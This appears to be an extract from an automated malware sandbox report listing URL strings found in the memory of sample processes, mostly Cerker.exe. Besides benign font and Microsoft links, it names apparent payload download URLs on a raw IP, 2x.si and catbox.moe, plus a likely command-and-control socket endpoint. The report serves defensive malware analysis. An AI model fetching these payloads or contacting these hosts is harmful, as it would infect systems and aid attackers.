Source: Cerker.exe, 00000008.00000003.1972256140.0000000001704000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/Jhiidutz.exet
Source: Cerker.exe, 00000014.00000002.2065013682.000000000119B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/Jhiidutz.exev
Source: Cerker.exe, 00000008.00000003.1906992557.0000000001704000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/Jhiidutz.exexM
Source: Cerker.exe, 00000008.00000003.1844836338.0000000001707000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000014.00000002.2065013682.000000000119B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/freedom.exe
Source: Cerker.exe, 00000008.00000003.1972256140.0000000001704000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/freedom.exe3Q9
Source: Cerker.exe, 00000008.00000003.1843946160.0000000001704000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.1844836338.0000000001707000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/freedom.exe9Q#
Source: Cerker.exe, 00000008.00000003.1972256140.0000000001704000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/freedom.exeIiGX.exe
Source: Cerker.exe, 00000008.00000003.1972256140.0000000001704000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/freedom.exeo
Source: Cerker.exe, 00000014.00000002.2065013682.000000000119B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/ocal
Source: svchost.exe, 00000001.00000002.3277930844.0000025614800000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000001.00000003.1637375313.0000025614A18000.00000004.00000800.00020000.00000000.sdmp, edb.log.1.dr, qmgr.db.1.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.1.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: qmgr.db.1.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.1.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000001.00000003.1637375313.0000025614A18000.00000004.00000800.00020000.00000000.sdmp, edb.log.1.dr, qmgr.db.1.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000001.00000003.1637375313.0000025614A18000.00000004.00000800.00020000.00000000.sdmp, edb.log.1.dr, qmgr.db.1.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000001.00000003.1637375313.0000025614A4D000.00000004.00000800.00020000.00000000.sdmp, edb.log.1.dr, qmgr.db.1.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.1.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000011.00000002.2156164658.0000000003011000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000011.00000002.2156164658.0000000003011000.00000004.00000800.00020000.00000000.sdmp, FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000011.00000002.2211716586.0000000013011000.00000004.00000800.00020000.00000000.sdmp, FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000011.00000000.1807181029.0000000000E02000.00000002.00000001.01000000.00000010.sdmp, ix4A2DreBBsQwY6YHkidcDjo.exe.8.dr, HM3SOlbpH71yEXUIEAOeIiGX.exe.8.dr, FRaqbC8wSA1XvpFVjCRGryWt.exe.8.dr	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 0000000B.00000002.2475758964.00000203695D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2226385244.000002035978A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000017.00000002.2340144406.000001CD31683000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.m
Source: 52i.exe, 00000003.00000002.1758329258.0000020280AD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.microsoft.co
Source: powershell.exe, 0000000B.00000002.2226385244.000002035978A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 52i.exe, 00000003.00000002.1762236134.00000202E7D4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2226385244.0000020359561000.00000004.00000800.00020000.00000000.sdmp, FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000011.00000002.2156164658.0000000003011000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000017.00000002.2051647717.000001CD18A7F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001A.00000002.4131368164.0000020D46AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000B.00000002.2226385244.000002035978A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Amcache.hve.2.dr	String found in binary or memory: http://upx.sf.net
Source: trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000B.00000002.2226385244.000002035978A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: mswabnet.exe, 00000032.00000002.4125195171.0000000002961000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/bot.html)
Source: ovrflw.exe, 00000012.00000002.1851294717.0000000002651000.00000004.00000800.00020000.00000000.sdmp, mswabnet.exe, 00000013.00000002.2064032593.0000000003291000.00000004.00000800.00020000.00000000.sdmp, mswabnet.exe, 00000020.00000002.1954592893.0000000002971000.00000004.00000800.00020000.00000000.sdmp, mswabnet.exe, 00000032.00000002.4125195171.0000000002961000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/bot.html))
Source: ovrflw.exe, 00000012.00000002.1851294717.0000000002651000.00000004.00000800.00020000.00000000.sdmp, mswabnet.exe, 00000013.00000002.2064032593.0000000003291000.00000004.00000800.00020000.00000000.sdmp, mswabnet.exe, 00000020.00000002.1954592893.0000000002971000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.googlebot.com/bot.html)
Source: ovrflw.exe, 00000012.00000002.1851294717.0000000002651000.00000004.00000800.00020000.00000000.sdmp, mswabnet.exe, 00000013.00000002.2064032593.0000000003291000.00000004.00000800.00020000.00000000.sdmp, mswabnet.exe, 00000020.00000002.1954592893.0000000002971000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.googlebot.com/bot.html)6
Source: mswabnet.exe, 00000032.00000002.4125195171.0000000002961000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.googlebot.com/bot.html)p
Source: trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: RegAsm.exe, 00000002.00000002.2080894884.00000000014D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2x.si/
Source: RegAsm.exe, 00000002.00000002.2080894884.00000000014D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2x.si/#
Source: RegAsm.exe, 00000002.00000002.2080894884.00000000014F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2x.si/52i.exe
Source: RegAsm.exe, 00000002.00000002.2080894884.00000000014F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2x.si/52i.exeQ
Source: powershell.exe, 0000000B.00000002.2226385244.0000020359561000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: xzzrvckwuia.exe, 00000029.00000002.2145857389.0000000003248000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.s
Source: xzzrvckwuia.exe, 00000029.00000002.2145857389.0000000003248000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: powershell.exe, 0000000B.00000002.2475758964.00000203695D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2475758964.00000203695D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2475758964.00000203695D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: xzzrvckwuia.exe, 00000029.00000002.2145857389.000000000330D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: aspnet_compiler.exe, 0000001A.00000002.4131368164.0000020D46C13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/k541xr.dll
Source: aspnet_compiler.exe, 0000001A.00000002.4131368164.0000020D46C13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/kwfxr7.dll
Source: RegAsm.exe, 00000002.00000002.2088920952.00000000040EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2088920952.00000000040E7000.00000004.00000020.00020000.00000000.sdmp, loli.exe.2.dr, googleupdats.exe.2.dr	String found in binary or memory: https://fonts.googleapis.com/css2?family=Nunito&display=swap
Source: RegAsm.exe, 00000002.00000002.2088920952.00000000040EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2088920952.00000000040E7000.00000004.00000020.00020000.00000000.sdmp, loli.exe.2.dr, googleupdats.exe.2.dr	String found in binary or memory: https://fonts.gstatic.com
Source: Cerker.exe, 0000002F.00000003.2440270925.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2646235985.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000002.4110577519.0000000001007000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2634227201.000000000106D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2493875039.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2547379699.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2348797808.0000000001061000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2466400626.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2453113628.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2561516266.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2634187209.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2480389569.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000002.4110577519.000000000106D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2561564937.0000000001062000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2309884036.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2603434773.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2363581672.000000000106C000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2659740463.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2415497371.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2659776588.0000000001062000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2533253732.000000000106D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/
Source: Cerker.exe, 0000002F.00000003.2415497371.00000000010AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/%w
Source: Cerker.exe, 0000002F.00000003.2348735064.00000000010AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/7w
Source: Cerker.exe, 0000002F.00000003.2466473691.000000000106E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/AppData
Source: Cerker.exe, 00000014.00000002.2065013682.000000000119B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/C
Source: Cerker.exe, 00000008.00000003.1843946160.0000000001704000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000002.2080368416.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.1844836338.0000000001707000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/E
Source: Cerker.exe, 0000002F.00000003.2309884036.000000000106E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/HX
Source: Cerker.exe, 0000002F.00000003.2466400626.00000000010AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/My
Source: Cerker.exe, 0000002F.00000003.2575856954.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2348735064.00000000010AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/T
Source: Cerker.exe, 0000002F.00000003.2547413407.0000000001062000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2321936899.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2466473691.000000000106E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/Temp
Source: Cerker.exe, 0000002F.00000003.2615950442.000000000106C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/W
Source: Cerker.exe, 0000002F.00000003.2533220270.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2440270925.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2547379699.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2561516266.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2520979923.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2506644934.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2427060889.00000000010AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/_age
Source: Cerker.exe, 0000002F.00000002.4110577519.000000000104D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/anci
Source: Cerker.exe, 00000014.00000002.2065013682.00000000011FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/b
Source: Cerker.exe, 00000014.00000002.2065013682.000000000119B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/g
Source: Cerker.exe, 0000002F.00000003.2378561693.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2335008330.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2401985089.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2390362622.00000000010AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/h
Source: Cerker.exe, 0000002F.00000003.2634227201.000000000106D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2659776588.0000000001062000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2646270754.000000000106D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/hy
Source: Cerker.exe, 0000002F.00000003.2561516266.00000000010AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/jv
Source: Cerker.exe, 00000014.00000002.2065013682.00000000011FA000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2440270925.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2646235985.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2547379699.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2590276721.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2480270807.00000000010AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/l
Source: Cerker.exe, 0000002F.00000003.2378588195.000000000106D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2348797808.0000000001061000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2309884036.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2363581672.000000000106C000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2335148342.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2390396630.000000000106D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2295452460.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2321936899.000000000106E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/low-meta.net/
Source: Cerker.exe, 00000008.00000002.2080368416.000000000172A000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000014.00000002.2065013682.000000000119B000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2378588195.000000000106D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2480389569.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2533253732.000000000106D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2390396630.000000000106D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2590313117.000000000106C000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2402319365.000000000106D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/low-meta.net/Temp
Source: Cerker.exe, 0000002F.00000002.4110577519.000000000104D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/n
Source: Cerker.exe, 00000014.00000002.2065013682.000000000119B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/pp-meta.net/Temp
Source: Cerker.exe, 00000008.00000003.2050751367.0000000001704000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.2050800394.0000000001728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/ppData
Source: Cerker.exe, 0000002F.00000003.2466400626.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2634187209.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2453082954.00000000010AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/qrXlYUQv
Source: Cerker.exe, 0000002F.00000003.2521012113.000000000109C000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2415545496.0000000001062000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2547413407.0000000001062000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2466473691.0000000001061000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2590313117.0000000001062000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2521012113.0000000001061000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B
Source: Cerker.exe, 00000008.00000003.1906992557.0000000001704000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.1843946160.0000000001704000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.1844836338.0000000001707000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/ta.net
Source: Cerker.exe, 00000008.00000002.2079172061.000000000135A000.00000004.00000010.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.2050751367.0000000001704000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.2050800394.0000000001728000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000002.2080368416.0000000001688000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000014.00000002.2065013682.0000000001148000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000014.00000002.2064233085.0000000000F3A000.00000004.00000010.00020000.00000000.sdmp, Cerker.exe, 00000014.00000002.2065013682.000000000119B000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2378588195.000000000106D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000002.4110577519.0000000001007000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2493875039.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2348797808.0000000001061000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2453113628.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2480389569.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2561564937.0000000001062000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2309884036.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2659776588.0000000001062000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2533253732.000000000106D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2440307951.000000000106D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2427205502.000000000106D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000002.4109992195.0000000000CFA000.00000004.00000010.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2295452460.000000000106E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/
Source: Cerker.exe, 00000014.00000002.2064233085.0000000000F3A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/(&
Source: Cerker.exe, 0000002F.00000002.4109992195.0000000000CFA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/.)
Source: Cerker.exe, 0000002F.00000003.2547413407.0000000001062000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/345342
Source: Cerker.exe, 0000002F.00000003.2402319365.000000000106D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/345342;
Source: Cerker.exe, 0000002F.00000003.2493875039.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2440307951.000000000106D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2427205502.000000000106D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/345342q&
Source: Cerker.exe, 00000014.00000002.2065013682.000000000119B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/42
Source: Cerker.exe, 00000014.00000002.2065013682.0000000001148000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/42J
